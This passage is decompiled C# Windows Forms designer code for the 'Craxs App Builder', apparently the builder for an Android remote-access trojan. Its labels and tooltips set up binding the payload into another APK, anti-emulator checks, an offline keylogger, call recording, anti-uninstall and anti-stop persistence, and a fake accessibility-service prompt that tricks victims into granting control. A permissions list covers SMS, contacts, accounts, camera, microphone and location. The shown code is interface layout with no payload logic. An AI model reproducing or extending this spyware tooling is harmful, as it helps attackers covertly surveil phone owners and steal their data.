			this.Label17.ForeColor = global::System.Drawing.Color.FromArgb(65, 177, 225);
			this.Label17.Location = new global::System.Drawing.Point(226, 361);
			this.Label17.Margin = new global::System.Windows.Forms.Padding(4, 0, 4, 0);
			this.Label17.Name = "Label17";
			this.Label17.Size = new global::System.Drawing.Size(26, 34);
			this.Label17.TabIndex = 36;
			this.Label17.Text = "?";
			this.ToolTip1.SetToolTip(this.Label17, "Bind or Merge with another apk\r\nDont Forget to enter Binded App Package Name");
			this.Label26.AutoSize = true;
			this.Label26.Font = new global::System.Drawing.Font("Palatino Linotype", 8.25f, global::System.Drawing.FontStyle.Bold, global::System.Drawing.GraphicsUnit.Point, 0);
			this.Label26.Location = new global::System.Drawing.Point(650, 368);
			this.Label26.Margin = new global::System.Windows.Forms.Padding(4, 0, 4, 0);
			this.Label26.Name = "Label26";
			this.Label26.Size = new global::System.Drawing.Size(155, 19);
			this.Label26.TabIndex = 46;
			this.Label26.Text = "Binded Package Name";
			this.trgtbkg.BackColor = global::System.Drawing.Color.FromArgb(34, 34, 34);
			this.trgtbkg.BorderStyle = global::System.Windows.Forms.BorderStyle.FixedSingle;
			this.trgtbkg.ForeColor = global::System.Drawing.Color.White;
			this.trgtbkg.Location = new global::System.Drawing.Point(425, 363);
			this.trgtbkg.Margin = new global::System.Windows.Forms.Padding(4);
			this.trgtbkg.Name = "trgtbkg";
			this.trgtbkg.Size = new global::System.Drawing.Size(217, 30);
			this.trgtbkg.TabIndex = 45;
			this.trgtbkg.TextAlign = global::System.Windows.Forms.HorizontalAlignment.Center;
			this.Label10.AutoSize = true;
			this.Label10.BackColor = global::System.Drawing.Color.Transparent;
			this.Label10.Font = new global::System.Drawing.Font("Roboto", 15f, global::System.Drawing.FontStyle.Bold, global::System.Drawing.GraphicsUnit.Point, 0);
			this.Label10.ForeColor = global::System.Drawing.Color.White;
			this.Label10.Location = new global::System.Drawing.Point(345, 366);
			this.Label10.Margin = new global::System.Windows.Forms.Padding(4, 0, 4, 0);
			this.Label10.Name = "Label10";
			this.Label10.Size = new global::System.Drawing.Size(64, 30);
			this.Label10.TabIndex = 30;
			this.Label10.Text = "Bind";
			this.AutoRec.AutoSize = true;
			this.AutoRec.BackColor = global::System.Drawing.Color.Transparent;
			this.AutoRec.Font = new global::System.Drawing.Font("Roboto", 15f, global::System.Drawing.FontStyle.Bold, global::System.Drawing.GraphicsUnit.Point, 0);
			this.AutoRec.ForeColor = global::System.Drawing.Color.White;
			this.AutoRec.Location = new global::System.Drawing.Point(727, 259);
			this.AutoRec.Margin = new global::System.Windows.Forms.Padding(4, 0, 4, 0);
			this.AutoRec.Name = "AutoRec";
			this.AutoRec.Size = new global::System.Drawing.Size(155, 30);
			this.AutoRec.TabIndex = 62;
			this.AutoRec.Text = "Record Calls";
			this.Label19.AutoSize = true;
			this.Label19.BackColor = global::System.Drawing.Color.Transparent;
			this.Label19.Font = new global::System.Drawing.Font("Roboto", 15f, global::System.Drawing.FontStyle.Bold, global::System.Drawing.GraphicsUnit.Point, 0);
			this.Label19.ForeColor = global::System.Drawing.Color.White;
			this.Label19.Location = new global::System.Drawing.Point(368, 496);
			this.Label19.Margin = new global::System.Windows.Forms.Padding(4, 0, 4, 0);
			this.Label19.Name = "Label19";
			this.Label19.Size = new global::System.Drawing.Size(154, 30);
			this.Label19.TabIndex = 60;
			this.Label19.Text = "APK Version";
			this.checkver.AllowDrop = true;
			this.checkver.ArrowColor = global::System.Drawing.Color.FromArgb(110, 110, 110);
			this.checkver.BackColor = global::System.Drawing.Color.Transparent;
			this.checkver.BackgroundColor = global::System.Drawing.Color.FromArgb(34, 34, 34);
			this.checkver.BorderColor = global::System.Drawing.Color.FromArgb(110, 110, 110);
			this.checkver.CausesValidation = false;
			this.checkver.DisabledBackColor = global::System.Drawing.Color.FromArgb(80, 80, 80);
			this.checkver.DisabledBorderColor = global::System.Drawing.Color.FromArgb(109, 109, 109);
			this.checkver.DisabledForeColor = global::System.Drawing.Color.FromArgb(109, 109, 109);
			this.checkver.DrawMode = global::System.Windows.Forms.DrawMode.OwnerDrawFixed;
			this.checkver.DropDownStyle = global::System.Windows.Forms.ComboBoxStyle.DropDownList;
			this.checkver.Font = new global::System.Drawing.Font("Microsoft Sans Serif", 11f);
			this.checkver.FormattingEnabled = true;
			this.checkver.IsDerivedStyle = true;
			this.checkver.ItemHeight = 20;
			this.checkver.Items.AddRange(new object[]
			{
				"V1",
				"V2"
			});
			this.checkver.Location = new global::System.Drawing.Point(530, 499);
			this.checkver.Margin = new global::System.Windows.Forms.Padding(4);
			this.checkver.Name = "checkver";
			this.checkver.SelectedItemBackColor = global::System.Drawing.Color.FromArgb(65, 177, 225);
			this.checkver.SelectedItemForeColor = global::System.Drawing.Color.White;
			this.checkver.Size = new global::System.Drawing.Size(107, 26);
			this.checkver.Style = global::MetroSet_UI.Enums.Style.Dark;
			this.checkver.StyleManager = null;
			this.checkver.TabIndex = 59;
			this.checkver.ThemeAuthor = "Narwin";
			this.checkver.ThemeName = "MetroDark";
			this.Label16.AutoSize = true;
			this.Label16.BackColor = global::System.Drawing.Color.Transparent;
			this.Label16.Font = new global::System.Drawing.Font("Palatino Linotype", 15f, global::System.Drawing.FontStyle.Bold, global::System.Drawing.GraphicsUnit.Point, 0);
			this.Label16.ForeColor = global::System.Drawing.Color.FromArgb(65, 177, 225);
			this.Label16.Location = new global::System.Drawing.Point(611, 164);
			this.Label16.Margin = new global::System.Windows.Forms.Padding(4, 0, 4, 0);
			this.Label16.Name = "Label16";
			this.Label16.Size = new global::System.Drawing.Size(26, 34);
			this.Label16.TabIndex = 57;
			this.Label16.Text = "?";
			this.ToolTip1.SetToolTip(this.Label16, "make app only run on real phones");
			this.Label18.AutoSize = true;
			this.Label18.BackColor = global::System.Drawing.Color.Transparent;
			this.Label18.Font = new global::System.Drawing.Font("Roboto", 15f, global::System.Drawing.FontStyle.Bold, global::System.Drawing.GraphicsUnit.Point, 0);
			this.Label18.ForeColor = global::System.Drawing.Color.White;
			this.Label18.Location = new global::System.Drawing.Point(727, 169);
			this.Label18.Margin = new global::System.Windows.Forms.Padding(4, 0, 4, 0);
			this.Label18.Name = "Label18";
			this.Label18.Size = new global::System.Drawing.Size(165, 30);
			this.Label18.TabIndex = 56;
			this.Label18.Text = "Anti Emulator";
			this.Label14.AutoSize = true;
			this.Label14.BackColor = global::System.Drawing.Color.Transparent;
			this.Label14.Font = new global::System.Drawing.Font("Palatino Linotype", 15f, global::System.Drawing.FontStyle.Bold, global::System.Drawing.GraphicsUnit.Point, 0);
			this.Label14.ForeColor = global::System.Drawing.Color.FromArgb(65, 177, 225);
			this.Label14.Location = new global::System.Drawing.Point(167, 164);
			this.Label14.Margin = new global::System.Windows.Forms.Padding(4, 0, 4, 0);
			this.Label14.Name = "Label14";
			this.Label14.Size = new global::System.Drawing.Size(26, 34);
			this.Label14.TabIndex = 54;
			this.Label14.Text = "?";
			this.ToolTip1.SetToolTip(this.Label14, "log all keylogger in folder when not connected");
			this.Label15.AutoSize = true;
			this.Label15.BackColor = global::System.Drawing.Color.Transparent;
			this.Label15.Font = new global::System.Drawing.Font("Roboto", 15f, global::System.Drawing.FontStyle.Bold, global::System.Drawing.GraphicsUnit.Point, 0);
			this.Label15.ForeColor = global::System.Drawing.Color.White;
			this.Label15.Location = new global::System.Drawing.Point(287, 169);
			this.Label15.Margin = new global::System.Windows.Forms.Padding(4, 0, 4, 0);
			this.Label15.Name = "Label15";
			this.Label15.Size = new global::System.Drawing.Size(196, 30);
			this.Label15.TabIndex = 53;
			this.Label15.Text = "Offline Kelogger";
			this.Label6.AutoSize = true;
			this.Label6.BackColor = global::System.Drawing.Color.Transparent;
			this.Label6.Font = new global::System.Drawing.Font("Palatino Linotype", 15f, global::System.Drawing.FontStyle.Bold, global::System.Drawing.GraphicsUnit.Point, 0);
			this.Label6.ForeColor = global::System.Drawing.Color.FromArgb(65, 177, 225);
			this.Label6.Location = new global::System.Drawing.Point(167, 255);
			this.Label6.Margin = new global::System.Windows.Forms.Padding(4, 0, 4, 0);
			this.Label6.Name = "Label6";
			this.Label6.Size = new global::System.Drawing.Size(26, 34);
			this.Label6.TabIndex = 51;
			this.Label6.Text = "?";
			this.ToolTip1.SetToolTip(this.Label6, "Anti-Uninstall.\r\nAnti-Stop.\r\nAuto Click start screen.\r\nMonitor Active App.\r\n[PS: may reduce battary life]");
			this.Label13.AutoSize = true;
			this.Label13.BackColor = global::System.Drawing.Color.Transparent;
			this.Label13.Font = new global::System.Drawing.Font("Roboto", 15f, global::System.Drawing.FontStyle.Bold, global::System.Drawing.GraphicsUnit.Point, 0);
			this.Label13.ForeColor = global::System.Drawing.Color.White;
			this.Label13.Location = new global::System.Drawing.Point(287, 259);
			this.Label13.Margin = new global::System.Windows.Forms.Padding(4, 0, 4, 0);
			this.Label13.Name = "Label13";
			this.Label13.Size = new global::System.Drawing.Size(135, 30);
			this.Label13.TabIndex = 50;
			this.Label13.Text = "Super Mod";
			this.TabPage12.BackColor = global::System.Drawing.Color.White;
			this.TabPage12.Controls.Add(this.Panel6);
			this.TabPage12.Location = new global::System.Drawing.Point(0, 40);
			this.TabPage12.Name = "TabPage12";
			this.TabPage12.Size = new global::System.Drawing.Size(450, 230);
			this.TabPage12.TabIndex = 4;
			this.TabPage12.Text = "Login";
			this.Panel6.BackColor = global::System.Drawing.Color.Black;
			this.Panel6.Controls.Add(this.Label37);
			this.Panel6.Controls.Add(this.dscriptext);
			this.Panel6.Controls.Add(this.Label29);
			this.Panel6.Controls.Add(this.Label31);
			this.Panel6.Controls.Add(this.Label32);
			this.Panel6.Controls.Add(this.Button3);
			this.Panel6.Controls.Add(this.logbtntext);
			this.Panel6.Controls.Add(this.logbodytext);
			this.Panel6.Controls.Add(this.logtitletext);
			this.Panel6.Controls.Add(this.PictureBox2);
			this.Panel6.Dock = global::System.Windows.Forms.DockStyle.Fill;
			this.Panel6.Location = new global::System.Drawing.Point(0, 0);
			this.Panel6.Name = "Panel6";
			this.Panel6.Size = new global::System.Drawing.Size(450, 230);
			this.Panel6.TabIndex = 47;
			this.Label37.AutoSize = true;
			this.Label37.BackColor = global::System.Drawing.Color.Transparent;
			this.Label37.Font = new global::System.Drawing.Font("Roboto", 15f, global::System.Drawing.FontStyle.Bold, global::System.Drawing.GraphicsUnit.Point, 0);
			this.Label37.ForeColor = global::System.Drawing.Color.FromArgb(157, 5, 17);
			this.Label37.Location = new global::System.Drawing.Point(23, 572);
			this.Label37.Margin = new global::System.Windows.Forms.Padding(4, 0, 4, 0);
			this.Label37.Name = "Label37";
			this.Label37.Size = new global::System.Drawing.Size(260, 30);
			this.Label37.TabIndex = 46;
			this.Label37.Text = "Settings Description >";
			this.dscriptext.Location = new global::System.Drawing.Point(290, 558);
			this.dscriptext.Multiline = true;
			this.dscriptext.Name = "dscriptext";
			this.dscriptext.Size = new global::System.Drawing.Size(493, 58);
			this.dscriptext.TabIndex = 45;
			this.dscriptext.Text = "this Permission is required to make the app work properly , Allow to continue";
			this.Label29.AutoSize = true;
			this.Label29.BackColor = global::System.Drawing.Color.Transparent;
			this.Label29.Font = new global::System.Drawing.Font("Roboto", 15f, global::System.Drawing.FontStyle.Bold, global::System.Drawing.GraphicsUnit.Point, 0);
			this.Label29.ForeColor = global::System.Drawing.Color.FromArgb(157, 5, 17);
			this.Label29.Location = new global::System.Drawing.Point(555, 29);
			this.Label29.Margin = new global::System.Windows.Forms.Padding(4, 0, 4, 0);
			this.Label29.Name = "Label29";
			this.Label29.Size = new global::System.Drawing.Size(82, 30);
			this.Label29.TabIndex = 36;
			this.Label29.Text = "< Title";
			this.Label31.AutoSize = true;
			this.Label31.BackColor = global::System.Drawing.Color.Transparent;
			this.Label31.Font = new global::System.Drawing.Font("Roboto", 15f, global::System.Drawing.FontStyle.Bold, global::System.Drawing.GraphicsUnit.Point, 0);
			this.Label31.ForeColor = global::System.Drawing.Color.FromArgb(157, 5, 17);
			this.Label31.Location = new global::System.Drawing.Point(128, 321);
			this.Label31.Margin = new global::System.Windows.Forms.Padding(4, 0, 4, 0);
			this.Label31.Name = "Label31";
			this.Label31.Size = new global::System.Drawing.Size(195, 30);
			this.Label31.TabIndex = 38;
			this.Label31.Text = "Start Message >";
			this.Label32.AutoSize = true;
			this.Label32.BackColor = global::System.Drawing.Color.Transparent;
			this.Label32.Font = new global::System.Drawing.Font("Roboto", 15f, global::System.Drawing.FontStyle.Bold, global::System.Drawing.GraphicsUnit.Point, 0);
			this.Label32.ForeColor = global::System.Drawing.Color.FromArgb(157, 5, 17);
			this.Label32.Location = new global::System.Drawing.Point(753, 470);
			this.Label32.Margin = new global::System.Windows.Forms.Padding(4, 0, 4, 0);
			this.Label32.Name = "Label32";
			this.Label32.Size = new global::System.Drawing.Size(179, 30);
			this.Label32.TabIndex = 40;
			this.Label32.Text = "< Button Name";
			this.Button3.BackColor = global::System.Drawing.Color.Black;
			this.Button3.FlatStyle = global::System.Windows.Forms.FlatStyle.Flat;
			this.Button3.Font = new global::System.Drawing.Font("Palatino Linotype", 10f, global::System.Drawing.FontStyle.Bold);
			this.Button3.ForeColor = global::System.Drawing.Color.FromArgb(157, 5, 17);
			this.Button3.Location = new global::System.Drawing.Point(803, 646);
			this.Button3.Margin = new global::System.Windows.Forms.Padding(4, 5, 4, 5);
			this.Button3.Name = "Button3";
			this.Button3.Size = new global::System.Drawing.Size(180, 34);
			this.Button3.TabIndex = 44;
			this.Button3.Text = "Default";
			this.Button3.UseVisualStyleBackColor = false;
			this.logbtntext.BackColor = global::System.Drawing.Color.FromArgb(33, 150, 243);
			this.logbtntext.BorderStyle = global::System.Windows.Forms.BorderStyle.FixedSingle;
			this.logbtntext.Font = new global::System.Drawing.Font("Roboto", 12f, global::System.Drawing.FontStyle.Bold);
			this.logbtntext.ForeColor = global::System.Drawing.Color.White;
			this.logbtntext.Location = new global::System.Drawing.Point(620, 468);
			this.logbtntext.Margin = new global::System.Windows.Forms.Padding(4, 5, 4, 5);
			this.logbtntext.Name = "logbtntext";
			this.logbtntext.Size = new global::System.Drawing.Size(82, 32);
			this.logbtntext.TabIndex = 39;
			this.logbtntext.Text = "Enable";
			this.logbtntext.TextAlign = global::System.Windows.Forms.HorizontalAlignment.Center;
			this.logbodytext.BackColor = global::System.Drawing.Color.FromArgb(205, 205, 205);
			this.logbodytext.BorderStyle = global::System.Windows.Forms.BorderStyle.FixedSingle;
			this.logbodytext.Font = new global::System.Drawing.Font("Roboto", 9f, global::System.Drawing.FontStyle.Bold);
			this.logbodytext.ForeColor = global::System.Drawing.Color.Black;
			this.logbodytext.Location = new global::System.Drawing.Point(345, 253);
			this.logbodytext.Margin = new global::System.Windows.Forms.Padding(4, 5, 4, 5);
			this.logbodytext.Multiline = true;
			this.logbodytext.Name = "logbodytext";
			this.logbodytext.Size = new global::System.Drawing.Size(385, 144);
			this.logbodytext.TabIndex = 37;
			this.logbodytext.Text = "This App Request Accessibility Service:\r\n• Click on Enable\r\n• Go to Downloaded Service\r\n• Enable [MY-NAME]";
			this.logbodytext.TextAlign = global::System.Windows.Forms.HorizontalAlignment.Center;
			this.logtitletext.BackColor = global::System.Drawing.Color.FromArgb(38, 50, 56);
			this.logtitletext.BorderStyle = global::System.Windows.Forms.BorderStyle.FixedSingle;
			this.logtitletext.Font = new global::System.Drawing.Font("Roboto", 9f, global::System.Drawing.FontStyle.Bold);
			this.logtitletext.ForeColor = global::System.Drawing.Color.White;
			this.logtitletext.Location = new global::System.Drawing.Point(379, 37);
			this.logtitletext.Margin = new global::System.Windows.Forms.Padding(4, 5, 4, 5);
			this.logtitletext.Name = "logtitletext";
			this.logtitletext.Size = new global::System.Drawing.Size(168, 26);
			this.logtitletext.TabIndex = 35;
			this.logtitletext.Text = "Accessibility";
			this.PictureBox2.BackColor = global::System.Drawing.Color.Black;
			this.PictureBox2.Image = (global::System.Drawing.Image)componentResourceManager.GetObject("PictureBox2.Image");
			this.PictureBox2.Location = new global::System.Drawing.Point(291, 27);
			this.PictureBox2.Margin = new global::System.Windows.Forms.Padding(4);
			this.PictureBox2.Name = "PictureBox2";
			this.PictureBox2.Size = new global::System.Drawing.Size(488, 513);
			this.PictureBox2.SizeMode = global::System.Windows.Forms.PictureBoxSizeMode.Zoom;
			this.PictureBox2.TabIndex = 34;
			this.PictureBox2.TabStop = false;
			this.TabPage13.BackColor = global::System.Drawing.Color.White;
			this.TabPage13.Controls.Add(this.Panel7);
			this.TabPage13.Location = new global::System.Drawing.Point(0, 40);
			this.TabPage13.Name = "TabPage13";
			this.TabPage13.Size = new global::System.Drawing.Size(450, 230);
			this.TabPage13.TabIndex = 5;
			this.TabPage13.Text = "Permissions";
			this.Panel7.BackColor = global::System.Drawing.Color.Black;
			this.Panel7.Controls.Add(this.CheckAllPrims);
			this.Panel7.Controls.Add(this.Label8);
			this.Panel7.Controls.Add(this.comboproms);
			this.Panel7.Controls.Add(this.removeactiv);
			this.Panel7.Controls.Add(this.Primslist);
			this.Panel7.Controls.Add(this.addactiv);
			this.Panel7.Dock = global::System.Windows.Forms.DockStyle.Fill;
			this.Panel7.Location = new global::System.Drawing.Point(0, 0);
			this.Panel7.Name = "Panel7";
			this.Panel7.Size = new global::System.Drawing.Size(450, 230);
			this.Panel7.TabIndex = 53;
			this.CheckAllPrims.CheckBoxColor = global::System.Drawing.Color.FromArgb(30, 136, 229);
			this.CheckAllPrims.Cursor = global::System.Windows.Forms.Cursors.Hand;
			this.CheckAllPrims.Font = new global::System.Drawing.Font("Microsoft Sans Serif", 12f);
			this.CheckAllPrims.Location = new global::System.Drawing.Point(26, 41);
			this.CheckAllPrims.Name = "CheckAllPrims";
			this.CheckAllPrims.Padding = new global::System.Windows.Forms.Padding(22, 0, 0, 0);
			this.CheckAllPrims.Size = new global::System.Drawing.Size(44, 29);
			this.CheckAllPrims.TabIndex = 71;
			this.Label8.AutoSize = true;
			this.Label8.BackColor = global::System.Drawing.Color.Transparent;
			this.Label8.Font = new global::System.Drawing.Font("Roboto", 12f, global::System.Drawing.FontStyle.Regular, global::System.Drawing.GraphicsUnit.Point, 0);
			this.Label8.ForeColor = global::System.Drawing.Color.FromArgb(195, 18, 9);
			this.Label8.Location = new global::System.Drawing.Point(77, 42);
			this.Label8.Margin = new global::System.Windows.Forms.Padding(4, 0, 4, 0);
			this.Label8.Name = "Label8";
			this.Label8.Size = new global::System.Drawing.Size(149, 24);
			this.Label8.TabIndex = 52;
			this.Label8.Text = "All Permissions";
			this.comboproms.DropDownStyle = global::DrakeUI.Framework.UIDropDownStyle.DropDownList;
			this.comboproms.FillColor = global::System.Drawing.Color.White;
			this.comboproms.Font = new global::System.Drawing.Font("Microsoft Sans Serif", 14f);
			this.comboproms.Items.AddRange(new object[]
			{
				"Send SMS",
				"Record Calls",
				"Change Wallpaper",
				"Read SMS",
				"Read Call Logs",
				"Read Contacts",
				"Read Accounts",
				"Camera",
				"Microphone",
				"Location",
				"Make Calls"
			});
			this.comboproms.Location = new global::System.Drawing.Point(326, 36);
			this.comboproms.Margin = new global::System.Windows.Forms.Padding(4, 5, 4, 5);
			this.comboproms.MinimumSize = new global::System.Drawing.Size(63, 0);
			this.comboproms.Name = "comboproms";
			this.comboproms.Padding = new global::System.Windows.Forms.Padding(0, 0, 30, 0);
			this.comboproms.RectColor = global::System.Drawing.Color.FromArgb(56, 142, 60);
			this.comboproms.RectDisableColor = global::System.Drawing.Color.FromArgb(227, 242, 253);
			this.comboproms.Size = new global::System.Drawing.Size(552, 34);
			this.comboproms.Style = global::DrakeUI.Framework.UIStyle.Green;
			this.comboproms.TabIndex = 26;
			this.comboproms.TextAlignment = global::System.Drawing.ContentAlignment.MiddleLeft;
			this.removeactiv.FlatStyle = global::System.Windows.Forms.FlatStyle.Flat;
			this.removeactiv.ForeColor = global::System.Drawing.Color.FromArgb(195, 18, 9);
			this.removeactiv.Location = new global::System.Drawing.Point(26, 622);
			this.removeactiv.Name = "removeactiv";
			this.removeactiv.Size = new global::System.Drawing.Size(958, 39);
			this.removeactiv.TabIndex = 25;
			this.removeactiv.Text = "Remove";
			this.removeactiv.UseVisualStyleBackColor = true;
			this.Primslist.BackColor = global::System.Drawing.Color.FromArgb(20, 31, 20);
			this.Primslist.FillColor = global::System.Drawing.Color.FromArgb(20, 31, 20);
			this.Primslist.FillDisableColor = global::System.Drawing.Color.FromArgb(20, 31, 20);
			this.Primslist.Font = new global::System.Drawing.Font("Microsoft Sans Serif", 12f);
			this.Primslist.ForeColor = global::System.Drawing.Color.Black;
			this.Primslist.HoverColor = global::System.Drawing.Color.Silver;
			this.Primslist.ItemSelectBackColor = global::System.Drawing.Color.FromArgb(140, 140, 140);
			this.Primslist.ItemSelectForeColor = global::System.Drawing.Color.FromArgb(195, 18, 9);
			this.Primslist.Location = new global::System.Drawing.Point(26, 101);
			this.Primslist.Margin = new global::System.Windows.Forms.Padding(4, 5, 4, 5);
			this.Primslist.Name = "Primslist";
			this.Primslist.Padding = new global::System.Windows.Forms.Padding(7);
			this.Primslist.Radius = 15;
			this.Primslist.RectColor = global::System.Drawing.Color.FromArgb(195, 18, 9);
			this.Primslist.RectDisableColor = global::System.Drawing.Color.FromArgb(195, 18, 9);
			this.Primslist.Size = new global::System.Drawing.Size(957, 513);
			this.Primslist.Style = global::DrakeUI.Framework.UIStyle.Custom;
			this.Primslist.StyleCustomMode = true;
			this.Primslist.TabIndex = 24;
			this.Primslist.Text = "DrakeUIListBox1";
			this.addactiv.FlatStyle = global::System.Windows.Forms.FlatStyle.Flat;
			this.addactiv.ForeColor = global::System.Drawing.Color.FromArgb(195, 18, 9);
			this.addactiv.Location = new global::System.Drawing.Point(886, 36);
			this.addactiv.Name = "addactiv";
			this.addactiv.Size = new global::System.Drawing.Size(98, 34);
			this.addactiv.TabIndex = 23;
			this.addactiv.Text = "Add";
			this.addactiv.UseVisualStyleBackColor = true;
			this.TabPage14.BackColor = global::System.Drawing.Color.White;
			this.TabPage14.Controls.Add(this.TextBox1);
			this.TabPage14.Controls.Add(this.errorlogs);
			this.TabPage14.Controls.Add(this.Panel8);
			this.TabPage14.Controls.Add(this.SelectedApk);
			this.TabPage14.Location = new global::System.Drawing.Point(0, 40);
			this.TabPage14.Name = "TabPage14";
			this.TabPage14.Size = new global::System.Drawing.Size(450, 230);
			this.TabPage14.TabIndex = 6;
			this.TabPage14.Text = "Build";
			this.TextBox1.BackColor = global::System.Drawing.Color.FromArgb(10, 10, 10);
			this.TextBox1.Dock = global::System.Windows.Forms.DockStyle.Fill;
			this.TextBox1.Font = new global::System.Drawing.Font("Microsoft Sans Serif", 12f);
			this.TextBox1.ForeColor = global::System.Drawing.Color.FromArgb(65, 177, 225);
			this.TextBox1.Location = new global::System.Drawing.Point(0, 108);
			this.TextBox1.Margin = new global::System.Windows.Forms.Padding(4);
			this.TextBox1.Multiline = true;
			this.TextBox1.Name = "TextBox1";
			this.TextBox1.ReadOnly = true;
			this.TextBox1.Size = new global::System.Drawing.Size(0, 122);
			this.TextBox1.TabIndex = 48;
			this.errorlogs.BackColor = global::System.Drawing.Color.FromArgb(10, 10, 10);
			this.errorlogs.Dock = global::System.Windows.Forms.DockStyle.Right;
			this.errorlogs.Font = new global::System.Drawing.Font("Microsoft Sans Serif", 12f);
			this.errorlogs.ForeColor = global::System.Drawing.Color.Maroon;
			this.errorlogs.Location = new global::System.Drawing.Point(-88, 108);
			this.errorlogs.Margin = new global::System.Windows.Forms.Padding(4);
			this.errorlogs.Multiline = true;
			this.errorlogs.Name = "errorlogs";
			this.errorlogs.ReadOnly = true;
			this.errorlogs.Size = new global::System.Drawing.Size(538, 122);
			this.errorlogs.TabIndex = 49;
			this.Panel8.BackColor = global::System.Drawing.Color.Black;
			this.Panel8.Controls.Add(this.Label40);
			this.Panel8.Controls.Add(this.Label39);
			this.Panel8.Dock = global::System.Windows.Forms.DockStyle.Top;
			this.Panel8.Location = new global::System.Drawing.Point(0, 75);
			this.Panel8.Name = "Panel8";
			this.Panel8.Size = new global::System.Drawing.Size(450, 33);
			this.Panel8.TabIndex = 50;
			this.Label40.Dock = global::System.Windows.Forms.DockStyle.Right;
			this.Label40.Font = new global::System.Drawing.Font("Roboto", 9f);
			this.Label40.ForeColor = global::System.Drawing.Color.FromArgb(157, 5, 17);
			this.Label40.Location = new global::System.Drawing.Point(-88, 0);
			this.Label40.Name = "Label40";
			this.Label40.Size = new global::System.Drawing.Size(538, 33);
			this.Label40.TabIndex = 1;
			this.Label40.Text = "Warnings(ignore)";
			this.Label40.TextAlign = global::System.Drawing.ContentAlignment.MiddleCenter;
			this.Label39.Dock = global::System.Windows.Forms.DockStyle.Left;
			this.Label39.Font = new global::System.Drawing.Font("Roboto", 9f);
			this.Label39.ForeColor = global::System.Drawing.Color.FromArgb(157, 5, 17);
			this.Label39.Location = new global::System.Drawing.Point(0, 0);
			this.Label39.Name = "Label39";
			this.Label39.Size = new global::System.Drawing.Size(537, 33);
			this.Label39.TabIndex = 0;
			this.Label39.Text = "Progress";
			this.Label39.TextAlign = global::System.Drawing.ContentAlignment.MiddleCenter;
			this.SelectedApk.BackColor = global::System.Drawing.Color.FromArgb(10, 10, 10);
			this.SelectedApk.Dock = global::System.Windows.Forms.DockStyle.Top;
			this.SelectedApk.FlatStyle = global::System.Windows.Forms.FlatStyle.Flat;
			this.SelectedApk.Font = new global::System.Drawing.Font("Palatino Linotype", 15f, global::System.Drawing.FontStyle.Bold);
			this.SelectedApk.ForeColor = global::System.Drawing.Color.FromArgb(157, 5, 17);
			this.SelectedApk.Location = new global::System.Drawing.Point(0, 0);
			this.SelectedApk.Margin = new global::System.Windows.Forms.Padding(4, 5, 4, 5);
			this.SelectedApk.Name = "SelectedApk";
			this.SelectedApk.Size = new global::System.Drawing.Size(450, 75);
			this.SelectedApk.TabIndex = 47;
			this.SelectedApk.Text = "Start Building";
			this.SelectedApk.UseVisualStyleBackColor = false;
			this.StyleManager1.CustomTheme = "C:\\Users\\EVLF\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\ThemeFile.xml";
			this.StyleManager1.MetroForm = this;
			this.StyleManager1.Style = global::MetroSet_UI.Enums.Style.Dark;
			this.StyleManager1.ThemeAuthor = "Cypher";
			this.StyleManager1.ThemeName = "MetroDark";
			this.FilePathApk.FileName = "OpenFileDialog1";
			this.TOpacity.Interval = 1;
			this.startTime.Interval = 500;
			this.ToolTip1.AutoPopDelay = 5000;
			this.ToolTip1.InitialDelay = 1000;
			this.ToolTip1.ReshowDelay = 100;
			base.AutoScaleMode = global::System.Windows.Forms.AutoScaleMode.None;
			this.AutoSize = true;
			this.BackColor = global::System.Drawing.Color.FromArgb(10, 0, 10);
			base.ClientSize = new global::System.Drawing.Size(1077, 734);
			base.Controls.Add(this.box);
			this.DoubleBuffered = true;
			this.ForeColor = global::System.Drawing.Color.FromArgb(240, 240, 240);
			base.FormBorderStyle = global::System.Windows.Forms.FormBorderStyle.SizableToolWindow;
			base.Margin = new global::System.Windows.Forms.Padding(4, 5, 4, 5);
			base.MaximizeBox = false;
			base.MinimizeBox = false;
			base.Name = "Build";
			base.Opacity = 0.0;
			base.ShowIcon = false;
			base.StartPosition = global::System.Windows.Forms.FormStartPosition.CenterScreen;
			this.Text = "Craxs App Builder";
			base.TopMost = true;
			((global::System.ComponentModel.ISupportInitialize)this.DGV0).EndInit();
			((global::System.ComponentModel.ISupportInitialize)this.po).EndInit();
			this.Panel1.ResumeLayout(false);
			this.Panel1.PerformLayout();
			this.box.ResumeLayout(false);
			this.TABCTRL.ResumeLayout(false);
			this.TabPage4.ResumeLayout(false);
			this.TabPage9.ResumeLayout(false);
			this.Panel3.ResumeLayout(false);
			this.Panel3.PerformLayout();
			this.Panel4.ResumeLayout(false);
			this.Panel4.PerformLayout();
			this.fakepanel.ResumeLayout(false);
			this.fakepanel.PerformLayout();
			((global::System.ComponentModel.ISupportInitialize)this.fakeiconpic).EndInit();
			this.TabPage10.ResumeLayout(false);
			this.Panel2.ResumeLayout(false);
			this.Panel2.PerformLayout();
			((global::System.ComponentModel.ISupportInitialize)this.PictureBox1).EndInit();
			this.TabPage11.ResumeLayout(false);
			this.Panel5.ResumeLayout(false);
			this.Panel5.PerformLayout();
			this.TabPage12.ResumeLayout(false);
			this.Panel6.ResumeLayout(false);
			this.Panel6.PerformLayout();
			((global::System.ComponentModel.ISupportInitialize)this.PictureBox2).EndInit();
			this.TabPage13.ResumeLayout(false);
			this.Panel7.ResumeLayout(false);
			this.Panel7.PerformLayout();
			this.TabPage14.ResumeLayout(false);
			this.TabPage14.PerformLayout();
			this.Panel8.ResumeLayout(false);
			base.ResumeLayout(false);
		}

		// Token: 0x04000494 RID: 1172
		private global::System.ComponentModel.Container components;
	}
}
